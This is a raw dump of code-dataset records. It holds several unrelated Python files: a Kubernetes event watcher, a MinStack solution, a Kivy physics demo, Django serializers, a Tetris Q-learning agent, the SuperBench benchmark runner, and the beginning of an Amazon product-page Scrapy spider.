Scrabble(players=3)\n\nfirst = s.who_goes_first()\n\ns.pick_first_tiles()\n\ncoords = [\n (0, 0),\n (0, 1),\n (0, 2),\n]\n\nword = list()\n\nword = 'ZOO'\n\ns.add_word(s.player_turn_queue,'test', word, coords)\n # CAT\n # { player: [1], word: { C: (7, 7), A: (7, 8), T: (7, 9) }\n\ns.get_tiles(player=1)\ntest = s.scoreboard.get_word_score(player=1, turn=1)\n\n\nstop = None","sub_path":"scrabble/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"561691098","text":"import json\nimport logging\nimport requests\nfrom kubernetes import watch\nfrom deepdiff import DeepDiff # For Deep Difference of 2 objects\nfrom .custom_object import CustomObjectManager\nfrom .namespaced_configmap import NamespacedConfigMapManager\nfrom .utility import UtilityManager\n\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nclass EventManager:\n\n def __init__(self, config, services):\n self.services = services\n self.config = config\n self.util = UtilityManager()\n self.co_manager = CustomObjectManager()\n self.cm_manager = NamespacedConfigMapManager()\n\n def is_deleted_event(self, event):\n return event[\"type\"] == \"DELETED\"\n\n def is_added_event(self, event):\n return event[\"type\"] == \"ADDED\"\n\n def is_modified_event(self, event):\n return event[\"type\"] == \"MODIFIED\"\n\n def is_ignored_event(self, event):\n\n configmap_details = self.cm_manager.read_namespaced_config_map(event[\"object\"][\"metadata\"]['namespace'], event[\"object\"][\"metadata\"]['name'])\n old_event_detail = json.loads(configmap_details.data[\"event\"])\n\n deep_diff_result = DeepDiff(\n self.util.get_attr(event['object'], \"spec\", {}),\n self.util.get_attr(old_event_detail[\"object\"], \"spec\", {}),\n ignore_order=True,\n report_repetition=True)\n\n # update configmap\n self.cm_manager.replace_namespaced_config_map(\n event[\"object\"][\"metadata\"][\"namespace\"],\n event[\"object\"][\"metadata\"][\"name\"],\n { \"event\": json.dumps(event) }\n )\n\n if {} == deep_diff_result:\n return True\n\n return False\n\n\n def watch_cluster_custom_object(self):\n\n stream = watch.Watch().stream(\n self.co_manager.coApi.list_cluster_custom_object,\n self.config[\"group\"],\n self.config[\"version\"],\n self.config[\"plural\"],\n watch=True\n )\n\n for event in stream:\n self.event_handler(event)\n\n def event_handler(self, event):\n # TODO:\n # - Async call\n if event[\"object\"][\"kind\"].lower() in self.config[\"plural\"]:\n\n # Ignore delete event\n if self.is_deleted_event(event):\n if not self.cm_manager.exist_namespaced_config_map(event[\"object\"][\"metadata\"][\"namespace\"], event[\"object\"][\"metadata\"][\"name\"]):\n return True\n\n return self.cm_manager.delete_namespaced_config_map(\n event[\"object\"][\"metadata\"][\"namespace\"],\n event[\"object\"][\"metadata\"][\"name\"]\n )\n\n if self.is_added_event(event):\n if self.cm_manager.exist_namespaced_config_map(event[\"object\"][\"metadata\"][\"namespace\"], event[\"object\"][\"metadata\"][\"name\"]):\n return True\n\n self.cm_manager.create_namespaced_config_map(\n event[\"object\"][\"metadata\"][\"namespace\"],\n event[\"object\"][\"metadata\"][\"name\"],\n {\n \"event\": json.dumps(event)\n }\n )\n\n if self.is_modified_event(event):\n if not self.cm_manager.exist_namespaced_config_map(event[\"object\"][\"metadata\"][\"namespace\"], event[\"object\"][\"metadata\"][\"name\"]):\n return False\n\n # Ignore status | outputs update event\n if self.is_ignored_event(event):\n return True\n\n logger.info(\"=========send event========= %s\", self.services[event[\"object\"][\"spec\"][\"type\"]])\n logger.info(event)\n res = requests.post(\"http://\" + self.services[event[\"object\"][\"spec\"][\"type\"]], headers = {'Content-type': 'application/json'}, data=json.dumps(event))\n logger.info(res)\n logger.info(\"================== end\")\n","sub_path":"src/kube/event_manager.py","file_name":"event_manager.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"258068120","text":"class MinStack(object):\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.s = []\n self.min = None\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: void\n \"\"\"\n \n if len(self.s) == 0:\n self.min = x\n elif x < self.min:\n self.min = x\n self.s.append(x)\n \n def pop(self):\n \"\"\"\n :rtype: void\n \"\"\"\n \n top = self.s.pop()\n if top==self.getMin():\n temp = []\n self.min = self.top()\n while(len(self.s)!=0):\n self.min = min(self.min,self.top())\n temp.append(self.s.pop())\n while(len(temp)!=0):\n self.s.append(temp.pop())\n \n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if len(self.s)==0:\n return None\n else:\n return self.s[-1]\n \n\n def getMin(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self.min\n \n\n\n# Your MinStack object will be instantiated and called as such:\n# obj = MinStack()\n# obj.push(x)\n# obj.pop()\n# param_3 = obj.top()\n# param_4 = obj.getMin()","sub_path":"155. Min Stack/155. Min Stack.py","file_name":"155. Min Stack.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90876477","text":"import cymunk as cy\nfrom os.path import dirname, join\nfrom kivy.clock import Clock\nfrom kivy.app import App\nfrom kivy.graphics import Color, Rectangle\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import DictProperty, ListProperty\nfrom kivy.core.image import Image\nfrom random import random\nfrom kivy.lang import Builder\n\nBuilder.load_string('''\n:\n Label:\n text: 'circles: %d' % len(root.blist)\n''')\n\nclass Playground(Widget):\n\n cbounds = ListProperty([])\n cmap = DictProperty({})\n blist = ListProperty([])\n\n def __init__(self, **kwargs):\n self._hue = 0\n super(Playground, self).__init__(**kwargs)\n self.init_physics()\n self.bind(size=self.update_bounds, pos=self.update_bounds)\n self.texture = Image(join(dirname(__file__), 'circle.png'), mipmap=True).texture\n Clock.schedule_interval(self.step, 1 / 30.)\n\n def init_physics(self):\n # create the space for physics simulation\n self.space = space = cy.Space()\n space.iterations = 30\n space.gravity = (0, -700)\n space.sleep_time_threshold = 0.5\n space.collision_slop = 0.5\n\n # create 4 segments that will act as a bounds\n for x in xrange(4):\n seg = cy.Segment(space.static_body,\n cy.Vec2d(0, 0), cy.Vec2d(0, 0), 0)\n seg.elasticity = 0.6\n #seg.friction = 1.0\n self.cbounds.append(seg)\n space.add_static(seg)\n\n # update bounds with good positions\n self.update_bounds()\n\n def update_bounds(self, *largs):\n assert(len(self.cbounds) == 4)\n a, b, c, d = self.cbounds\n x0, y0 = self.pos\n x1 = self.right\n y1 = self.top\n\n self.space.remove_static(a)\n self.space.remove_static(b)\n self.space.remove_static(c)\n self.space.remove_static(d)\n a.a = (x0, y0)\n a.b = (x1, y0)\n b.a = (x1, y0)\n b.b = (x1, y1)\n c.a = (x1, y1)\n c.b = (x0, y1)\n d.a = (x0, y1)\n d.b = (x0, y0)\n self.space.add_static(a)\n self.space.add_static(b)\n self.space.add_static(c)\n self.space.add_static(d)\n\n def step(self, dt):\n self.space.step(1 / 30.)\n self.update_objects()\n\n def update_objects(self):\n for body, obj in self.cmap.iteritems():\n p = body.position\n radius, color, rect = obj\n rect.pos = p.x - radius, p.y - radius\n rect.size = radius * 2, radius * 2\n\n def add_random_circle(self):\n self.add_circle(\n self.x + random() * self.width,\n self.y + random() * self.height,\n 10 + random() * 50)\n\n def add_circle(self, x, y, radius):\n # create a falling circle\n body = cy.Body(100, 1e9)\n body.position = x, y\n circle = cy.Circle(body, radius)\n circle.elasticity = 0.6\n #circle.friction = 1.0\n self.space.add(body, circle)\n\n with self.canvas.before:\n self._hue = (self._hue + 0.01) % 1\n color = Color(self._hue, 1, 1, mode='hsv')\n rect = Rectangle(\n texture=self.texture,\n pos=(self.x - radius, self.y - radius),\n size=(radius * 2, radius * 2))\n self.cmap[body] = (radius, color, rect)\n\n # remove the oldest one\n self.blist.append((body, circle))\n if len(self.blist) > 200:\n body, circle = self.blist.pop(0)\n self.space.remove(body)\n self.space.remove(circle)\n radius, color, rect = self.cmap.pop(body)\n self.canvas.before.remove(color)\n self.canvas.before.remove(rect)\n\n def on_touch_down(self, touch):\n self.add_circle(touch.x, touch.y, 10 + random() * 20)\n\n def on_touch_move(self, touch):\n self.add_circle(touch.x, touch.y, 10 + random() * 20)\n\nclass PhysicsApp(App):\n def build(self):\n return Playground()\n\nif __name__ == '__main__':\n PhysicsApp().run()\n","sub_path":"KivyProject/cymunkdemo/examples/circle_box/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"351904406","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom django.contrib.auth.models import *\nfrom subscriptions.models import *\nfrom rest_framework.exceptions import APIException\nimport datetime\n\n\nclass SubscriptionTypeSerializer(ModelSerializer):\n\n class Meta:\n model = SubscriptionType\n fields= \"__all__\"\n\nclass SubscriptionSerializer(ModelSerializer):\n class Meta:\n model = Subscription\n # fields= \"__all__\"\n fields = ['id', 'app_master', 'subscription_type', 'offer_code', 'price_master', 'total_cost']\n\nclass SubscriptionCreateSerializer(ModelSerializer):\n app_master = serializers.IntegerField(required=False)\n subscription_type = serializers.IntegerField(required=False)\n offer_code = serializers.IntegerField(required=False)\n price_master = serializers.IntegerField(required=False)\n valid_until = serializers.DateTimeField(required=False)\n total_cost = serializers.DecimalField(required=False, decimal_places=2,max_digits=10)\n class Meta:\n model = Subscription\n fields= ['id','app_master','subscription_type','offer_code','price_master','total_cost','valid_until']\n\n def create(self, validated_data):\n\n try:\n get_subscription_type = list(\n SubscriptionType.objects.values('days').filter(pk=validated_data.get('subscription_type')))\n day_duration = get_subscription_type[0]['days']\n paytm = True\n valid_until = datetime.datetime.now() + datetime.timedelta(days=day_duration)\n print('valid_until:',valid_until)\n create_subscription = Subscription.objects.create(valid_until=valid_until,\n app_master_id =validated_data.get('app_master'),\n subscription_type_id =validated_data.get('subscription_type'),\n offer_code_id =validated_data.get('offer_code'),\n price_master_id =validated_data.get('price_master'),\n total_cost =validated_data.get('total_cost'))\n print('create_subscription::', create_subscription)\n\n\n return {\n 'id':create_subscription.id,\n 'app_master':create_subscription.app_master.id,\n 'subscription_type':create_subscription.subscription_type.id,\n 'offer_code':create_subscription.offer_code.id if create_subscription.offer_code else 0 ,\n 'price_master':create_subscription.price_master.id,\n 'total_cost':create_subscription.total_cost,\n 'valid_until':create_subscription.valid_until\n }\n except Exception as e:\n raise APIException({\n 'msg': e,\n 'success': 0\n })","sub_path":"subscriptions/z_serializers.py","file_name":"z_serializers.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"489102637","text":"from collections import defaultdict\nimport pyautogui\nimport time\n\nclass Tagent:\n\t#qvalues: input is block, dict: input is (mask + action)\n\tqvalues = [defaultdict(int), defaultdict(int), defaultdict(int), defaultdict(int), defaultdict(int), defaultdict(int), defaultdict(int)]\n\talpha = 0\n\tgamma = 0\n\n\tdef __init__(self, learningrate = 0.5, discount = 0.5):\n\t\tself.alpha = learningrate\n\t\tself.gamma = discount\n\t\tprint(learningrate,discount)\n\t\n\tdef sendmask(self, state, width):\n\t\tmask = []\n\t\tfor i in range(10 - width + 1):\n\t\t\tcon = \"\"\n\t\t\tfor j in range(width - 1):\n\t\t\t\t#print(i+j)\n\t\t\t\tcon = con + str(state[i+j]) + \",\"\n\t\t\tmask.append(con)\n\t\treturn mask\n\t\n\tdef maxaction(self, state, block):\n\t\ttable = self.qvalues[block]\n\t\tbestaction = -1\n\t\tbestmask = -1\n\t\tbesti = -1\n\t\tbestq = -999\n\t\t\n\t\tmask2 = self.sendmask(state, 2)\n\t\tmask3 = self.sendmask(state, 3)\n\t\tmask4 = self.sendmask(state, 4)\n\t\t\n\t\tif block == 0:\n\t\t\t#(no flip) mask4: N\n\t\t\tfor i in range(len(mask4)):\n\t\t\t\tif bestq < table[mask4[i] + \"0\"]:\n\t\t\t\t\tbestaction = 0\n\t\t\t\t\tbestmask = 4\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask4[i] + \"0\"]\n\t\t\t#(1 flip) mask2: L, N\n\t\t\tfor j in range(2):\n\t\t\t\tfor i in range(len(mask2)):\n\t\t\t\t\tif bestq < table[mask2[i] + str(j)]:\n\t\t\t\t\t\tbestaction = j\n\t\t\t\t\t\tbestmask = 2\n\t\t\t\t\t\tbesti = i\n\t\t\t\t\t\tbestq = table[mask2[i] + str(j)]\n\t\t\t\t\t\t\n\t\telif block == 1:\n\t\t\n\t\t\t#(no flip) mask2: N\n\t\t\tfor i in range(len(mask2)):\n\t\t\t\tif bestq < table[mask2[i] + \"0\"]:\n\t\t\t\t\tbestaction = 0\n\t\t\t\t\tbestmask = 2\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask2[i] + \"0\"]\n\n\t\telif block == 3 or block == 4:\n\t\t\n\t\t\t#(no flip) mask3: N\n\t\t\tfor i in range(len(mask3)):\n\t\t\t\tif bestq < table[mask3[i] + \"0\"]:\n\t\t\t\t\tbestaction = 0\n\t\t\t\t\tbestmask = 3\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask3[i] + \"0\"]\n\t\t\t\n\t\t\t#(flip) mask2: N\n\t\t\tfor i in range(len(mask2)):\n\t\t\t\tif bestq < table[mask2[i] + \"1\"]:\n\t\t\t\t\t#print(i)\n\t\t\t\t\tbestaction = 1\n\t\t\t\t\tbestmask = 2\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask2[i] + \"1\"]\n\t\t\t\t\t\n\t\telse:\n\t\t#make more compact, combine for loops\n\t\t\t#(no flip) mask3: N\n\t\t\tfor i in range(len(mask3)):\n\t\t\t\tif bestq < table[mask3[i] + \"0\"]:\n\t\t\t\t\tbestaction = 0\n\t\t\t\t\tbestmask = 3\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask3[i] + \"0\"]\n\t\t\t\t\n\t\t\t#(flip) mask2: N\n\t\t\tfor i in range(len(mask2)):\n\t\t\t\tif bestq < table[mask2[i] + \"1\"]:\n\t\t\t\t\tbestaction = 1\n\t\t\t\t\tbestmask = 2\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask3[i] + \"1\"]\n\t\t\t\n\t\t\t#(flip/flip) mask3: N\n\t\t\tfor i in range(len(mask3)):\n\t\t\t\tif bestq < table[mask3[i] + \"2\"]:\n\t\t\t\t\tbestaction = 2\n\t\t\t\t\tbestmask = 3\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask3[i] + \"2\"]\n\t\t\t\t\t\n\t\t\t#(flip/flip/flip/right) mask4: N\n\t\t\tfor i in range(len(mask2)):\n\t\t\t\tif bestq < table[mask2[i] + \"3\"]:\n\t\t\t\t\tbestaction = 3\n\t\t\t\t\tbestmask = 2\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask2[i] + \"3\"]\n\t\t\n\t\tif bestmask == 2:\n\t\t\treturn bestaction, mask2, bestmask, besti\n\t\telif bestmask == 3:\n\t\t\treturn bestaction, mask3, bestmask, besti\n\t\telse:\n\t\t\treturn bestaction, mask4, bestmask, besti\n\t\n\t\n\t#greedy policy\n\tdef takeaction(self, state, block):\n\t\tnextaction, mask, bestwidth, besti = self.maxaction(state, block)\n\t\t\n\t\t#take catered action\n\t\tself.inputcommand(block, nextaction, bestwidth, besti)\n\t\tpyautogui.press('space')\n\t\t\n\t\treturn nextaction, mask, besti\n\t\n\tdef inputcommand(self, block, action, width, i):\n\t\n\t\t#calculate shift blocks need to move\n\t\tshift = i - 3\n\t\tif width == 2:\n\t\t\tshift = shift - 1\n\t\n\t\t#flip blocks based on action\n\t\tif block != 0:\n\t\t\tfor i in range(action):\n\t\t\t\tpyautogui.press('up')\n\t\t\t\tif i == 3:\n\t\t\t\t\tpyautogui.press('right')\n\t\t\n\t\t#special case for block 0\n\t\tif block == 0 and action != 0:\n\t\t\tpyautogui.press('up')\n\t\t\tif action == 1:\n\t\t\t\tpyautogui.press('left')\n\t\t\t\t\n\t\t\t\t\n\t\t#print(shift,width,i)\n\t\t#translate based on shift\n\t\tfor i in range(abs(shift)):\n\t\t\tif shift < 0:\n\t\t\t\tpyautogui.press('left')\n\t\t\telse:\n\t\t\t\tpyautogui.press('right')\n\t\t\n\t#updates q-value table\n\tdef updateq(self, state, mask, besti, block, action, reward, nextstate, nextblock):\n\t\ttable = self.qvalues[block]\n\t\tcurq = table[mask[besti] + str(action)]\n\t\tnextaction, nextmask, masknum, nexti = self.maxaction(nextstate,nextblock)\n\t\tcurnextq = table[nextmask[nexti] + str(nextaction)]\n\t\tnewq = curq + self.alpha * (reward + (self.gamma * curnextq) - curq)\n\t\ttable[mask[besti] + str(action)] = newq\n\t\treturn curq, newq\n\t\t\n\t#if agent failed, will attempt to reset board\n\tdef resetboard(self):\n\t\tgame = True\n\t\twhile game:\n\t\t\ttry:\n\t\t\t\tpyautogui.locateOnScreen('temp/gameover.png')\n\t\t\t\tprint(\"found gameover screen\")\n\t\t\t\tpyautogui.press('space')\n\t\t\t\tgame = False\n\t\t\texcept Exception:\n\t\t\t\tpyautogui.press('space')\n\t\t\t\t#time.sleep(0.01)\n","sub_path":"Webdatabase/tagent.py","file_name":"tagent.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"1320047","text":"# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\n\"\"\"SuperBench Runner.\"\"\"\n\nimport random\nfrom pathlib import Path\n\nfrom joblib import Parallel, delayed\nfrom omegaconf import ListConfig, OmegaConf\n\nfrom superbench.common.utils import SuperBenchLogger, logger\nfrom superbench.runner.ansible import AnsibleClient\n\n\nclass SuperBenchRunner():\n \"\"\"SuperBench runner class.\"\"\"\n def __init__(self, sb_config, docker_config, ansible_config, sb_output_dir):\n \"\"\"Initilize.\n\n Args:\n sb_config (DictConfig): SuperBench config object.\n docker_config (DictConfig): Docker config object.\n ansible_config (DictConfig): Ansible config object.\n sb_output_dir (str): SuperBench output directory.\n \"\"\"\n self._sb_config = sb_config\n self._docker_config = docker_config\n self._ansible_config = ansible_config\n self._sb_output_dir = sb_output_dir\n self._output_path = Path(sb_output_dir).expanduser().resolve()\n self._ansible_client = AnsibleClient(ansible_config)\n\n self.__set_logger('sb-run.log')\n logger.info('Runner uses config: %s.', self._sb_config)\n logger.info('Runner writes to: %s.', str(self._output_path))\n\n self._sb_benchmarks = self._sb_config.superbench.benchmarks\n self.__validate_sb_config()\n self._sb_enabled_benchmarks = self.__get_enabled_benchmarks()\n logger.info('Runner will run: %s', self._sb_enabled_benchmarks)\n\n def __set_logger(self, filename):\n \"\"\"Set logger and add file handler.\n\n Args:\n filename (str): Log file name.\n \"\"\"\n SuperBenchLogger.add_handler(logger.logger, filename=str(self._output_path / filename))\n\n def __validate_sb_config(self):\n \"\"\"Validate SuperBench config object.\n\n Raise:\n InvalidConfigError: If input config is invalid.\n \"\"\"\n # TODO: add validation and defaulting\n if not self._sb_config.superbench.env:\n self._sb_config.superbench.env = {}\n for name in self._sb_benchmarks:\n if not self._sb_benchmarks[name].modes:\n self._sb_benchmarks[name].modes = []\n for idx, mode in enumerate(self._sb_benchmarks[name].modes):\n if mode.name == 'local':\n if not mode.proc_num:\n self._sb_benchmarks[name].modes[idx].proc_num = 1\n if not mode.prefix:\n self._sb_benchmarks[name].modes[idx].prefix = ''\n elif mode.name == 'torch.distributed':\n if not mode.proc_num:\n self._sb_benchmarks[name].modes[idx].proc_num = 8\n\n def __get_enabled_benchmarks(self):\n \"\"\"Get enabled benchmarks list.\n\n Return:\n list: List of benchmarks which will be executed.\n \"\"\"\n if self._sb_config.superbench.enable:\n if isinstance(self._sb_config.superbench.enable, str):\n return [self._sb_config.superbench.enable]\n elif isinstance(self._sb_config.superbench.enable, (list, ListConfig)):\n return list(self._sb_config.superbench.enable)\n return [k for k, v in self._sb_benchmarks.items() if v.enable]\n\n def __get_mode_command(self, benchmark_name, mode):\n \"\"\"Get runner command for given mode.\n\n Args:\n benchmark_name (str): Benchmark name.\n mode (DictConfig): Runner mode.\n\n Return:\n str: Runner command.\n \"\"\"\n exec_command = ('sb exec --output-dir {output_dir} -c sb.config.yaml -C superbench.enable={name}').format(\n name=benchmark_name,\n output_dir=self._sb_output_dir,\n )\n mode_command = exec_command\n if mode.name == 'local':\n mode_command = '{prefix} {command}'.format(\n prefix=mode.prefix.format(proc_rank=mode.proc_rank, proc_num=mode.proc_num),\n command=exec_command,\n )\n mode_command = f'PROC_RANK={mode.proc_rank} {mode_command.strip()}'\n elif mode.name == 'torch.distributed':\n # TODO: replace with torch.distributed.run in v1.9\n # TODO: only supports node_num=1 and node_num=all currently\n mode_command = (\n 'python3 -m torch.distributed.launch '\n '--use_env --no_python --nproc_per_node={proc_num} '\n '--nnodes={node_num} --node_rank=$NODE_RANK '\n '--master_addr=$MASTER_ADDR --master_port=$MASTER_PORT '\n '{command} {torch_distributed_suffix}'\n ).format(\n proc_num=mode.proc_num,\n node_num=1 if mode.node_num == 1 else '$NNODES',\n command=exec_command,\n torch_distributed_suffix=(\n 'superbench.benchmarks.{name}.parameters.distributed_impl=ddp '\n 'superbench.benchmarks.{name}.parameters.distributed_backend=nccl'\n ).format(name=benchmark_name),\n )\n return mode_command.strip()\n\n def deploy(self): # pragma: no cover\n \"\"\"Deploy SuperBench environment.\"\"\"\n logger.info('Preparing SuperBench environment.')\n extravars = {\n 'ssh_port': random.randint(1 << 14, (1 << 15) - 1),\n 'output_dir': str(self._output_path),\n 'docker_image': self._docker_config.image,\n 'gpu_vendor': 'nvidia',\n }\n if bool(self._docker_config.username) and bool(self._docker_config.password):\n extravars.update(\n {\n 'docker_registry': self._docker_config.registry,\n 'docker_username': self._docker_config.username,\n 'docker_password': self._docker_config.password,\n }\n )\n self._ansible_client.run(self._ansible_client.get_playbook_config('deploy.yaml', extravars=extravars))\n\n def check_env(self): # pragma: no cover\n \"\"\"Check SuperBench environment.\"\"\"\n logger.info('Checking SuperBench environment.')\n OmegaConf.save(config=self._sb_config, f=str(self._output_path / 'sb.config.yaml'))\n self._ansible_client.run(\n self._ansible_client.get_playbook_config(\n 'check_env.yaml',\n extravars={\n 'output_dir': str(self._output_path),\n 'env': '\\n'.join(f'{k}={v}' for k, v in self._sb_config.superbench.env.items()),\n }\n )\n )\n\n def fetch_results(self): # pragma: no cover\n \"\"\"Fetch benchmark results on all nodes.\"\"\"\n try:\n (self._output_path / 'nodes').mkdir(mode=0o755, parents=True, exist_ok=True)\n except Exception:\n logger.exception('Failed to create directory %s.', str(self._output_path / 'nodes'))\n raise\n self._ansible_client.run(\n self._ansible_client.get_playbook_config(\n 'fetch_results.yaml',\n extravars={\n 'sb_output_dir': self._sb_output_dir,\n 'absolute_output_dir': str(self._output_path),\n }\n )\n )\n\n def _run_proc(self, benchmark_name, mode, vars):\n \"\"\"Run the process.\n\n Args:\n benchmark_name (str): Benchmark name.\n mode (DictConfig): Runner mode.\n vars (dict): Process variables.\n\n Returns:\n int: Process return code.\n \"\"\"\n mode.update(vars)\n logger.info('Runner is going to run %s in %s mode, proc rank %d.', benchmark_name, mode.name, mode.proc_rank)\n rc = self._ansible_client.run(\n self._ansible_client.get_shell_config(\n (\n 'docker exec sb-workspace bash -c '\n \"'set -o allexport && source sb.env && set +o allexport && {command}'\"\n ).format(command=self.__get_mode_command(benchmark_name, mode), )\n ),\n sudo=True\n )\n return rc\n\n def run(self):\n \"\"\"Run the SuperBench benchmarks distributedly.\"\"\"\n self.check_env()\n for benchmark_name in self._sb_benchmarks:\n if benchmark_name not in self._sb_enabled_benchmarks:\n continue\n benchmark_config = self._sb_benchmarks[benchmark_name]\n for mode in benchmark_config.modes:\n if mode.name == 'local':\n Parallel(n_jobs=mode.proc_num if mode.parallel else 1)(\n delayed(self._run_proc)(benchmark_name, mode, {\n 'proc_rank': proc_rank\n }) for proc_rank in range(mode.proc_num)\n )\n elif mode.name == 'torch.distributed':\n self._run_proc(benchmark_name, mode, {'proc_rank': 0})\n self.fetch_results()\n","sub_path":"superbench/runner/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"332825291","text":"__author__ = 'Debashis'\n\n\nclass Employee:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def myinfo(self):\n print(\"My Name is: \", self.name)\n\nemp = Employee(\"Deba\", 28)\ndel emp.name\nemp.myinfo()","sub_path":"delete_object_properties.py","file_name":"delete_object_properties.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"28241251","text":"\"\"\"\nСоздать программно файл в текстовом формате, записать в него построчно данные,\nвводимые пользователем.\nОб окончании ввода данных свидетельствует пустая строка.\n\"\"\"\n\nif __name__ == \"__main__\":\n try:\n print(\"Введите данные построчно.\\n\"\n \"Для окончания ввода введи пустую строку.\")\n with open(\"Homework#5.1.txt\", \"w\") as file:\n while True:\n temp_line = input()\n if temp_line:\n file.write(f\"{temp_line}\\n\")\n else:\n break\n except IOError as e:\n print(f\"Произошла ошибка в вода вывода:\\n{e}:\")\n","sub_path":"Урок 5. Работа с файлами/Homework#5.1/Homework#5.1.py","file_name":"Homework#5.1.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"257123504","text":"import pytz\n\nfrom flask import render_template\n\nfrom standardweb.tasks import send_rts_data as send_rts_data_task\n\n\ndef new_message(user, message):\n message_row_html = render_template(\n 'messages/includes/message_row.html',\n user=user,\n message=message\n )\n\n payload = {\n 'date': message.sent_at.replace(tzinfo=pytz.UTC).isoformat(),\n 'message_row_html': message_row_html,\n 'from_user_id': message.from_user_id\n }\n\n send_rts_data(message.to_user_id, 'messages', 'new', payload)\n\n\ndef unread_message_count(user):\n payload = {\n 'count': user.get_unread_message_count()\n }\n\n send_rts_data(user.id, 'messages', 'unread-count', payload)\n\n\ndef send_rts_data(user_id, channel, action, payload):\n send_rts_data_task.apply_async((\n user_id,\n channel,\n action,\n payload\n ))\n","sub_path":"standardweb/lib/realtime.py","file_name":"realtime.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"297440349","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.loader import ItemLoader\nfrom amazon_product_page_parser.items import Product\nimport sys\nimport logging\nfrom datetime import datetime\nimport os\nimport esprima \nimport json\nfrom time import sleep\n\nclass ProductPageParserSpider(scrapy.Spider):\n name = 'product_page_parser_desktop'\n allowed_domains = ['amazon.in']\n exchange = 'jobs'\n\n @classmethod \n def from_crawler(cls, crawler, *args, **kwargs):\n # super(ProductPageParserSpider, cls).from_crawler(crawler, *args, **kwargs)\n return cls(\n bot_name=crawler.settings.get('BOT_NAME'),\n *args,\n **kwargs\n )\n\n def __init__(self, bot_name, seeds=None, task_id=None, pipeline_id=None, source_url=None, crawl_time=None, reprocessed=False, *args, **kwargs):\n super(ProductPageParserSpider, self).__init__(*args, **kwargs)\n if seeds is None or task_id is None:\n sys.exit(0)\n \n if pipeline_id is None:\n sys.exit(0)\n\n self.task_id = task_id\n self.job_id = kwargs['_job']\n self.pipeline_id = pipeline_id\n self.seeds = seeds.split('|')\n self.source_url = source_url\n self.bot_name = bot_name\n self.crawl_time = crawl_time\n self.reprocessed = bool(reprocessed)\n self.__configure_logger()\n logging.getLogger('pika').setLevel(logging.WARN)\n\n def __configure_logger(self):\n \n logger = logging.getLogger(self.name)\n \n folder_path = f'/scrapyd/logs-internal/{self.bot_name}/{self.name}/'\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n # Create handlers\n c_handler = logging.StreamHandler()\n f_handler = logging.FileHandler(f'{folder_path}/{self.pipeline_id}.log')\n c_handler.setLevel(logging.WARNING)\n f_handler.setLevel(logging.INFO)\n\n # Create formatters and add it to handlers\n c_format = logging.Formatter('%(name)s - %(levelname)s - %(message)s')\n f_format = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n c_handler.setFormatter(c_format)\n f_handler.setFormatter(f_format)\n\n # Add handlers to the logger\n logger.addHandler(c_handler)\n logger.addHandler(f_handler)\n \n def start_requests(self):\n for seed in self.seeds:\n yield scrapy.Request(seed, callback=self.parse)\n\n def parse(self, response):\n if self.check_blocked(response):\n return\n product = ItemLoader(item=Product(), response=response)\n asin_info = self.__get_asin_info(response)\n\n canonical_link = response.xpath('//*[@rel=\"canonical\"]/@href').get()\n asin = os.path.basename(canonical_link) or \"Not_Found\"\n product.add_value('asin', asin)\n product.add_value('parent_asin', asin_info['parent'])\n product.add_value('children_asin', asin_info['children'])\n product.add_xpath('title', '//span[@id=\"productTitle\"]/text()')\n product.add_xpath('manufacturer', '//a[@id=\"bylineInfo\"]/text()')\n product.add_xpath('rating', '//div[@id=\"averageCustomerReviews\"]//span[@id=\"acrPopover\"]/@title')\n product.add_xpath('rating_count', '//div[@id=\"averageCustomerReviews\"]//span[@id=\"acrCustomerReviewText\"]/text()[normalize-space(.)]')\n product.add_xpath('answered_questions', '//a[@id=\"askATFLink\"]/span/text()[normalize-space(.)]')\n product.add_xpath('promote', '//div[@data-feature-name=\"acBadge\"]//span//text()[normalize-space(.)]')\n product.add_xpath('mrp', 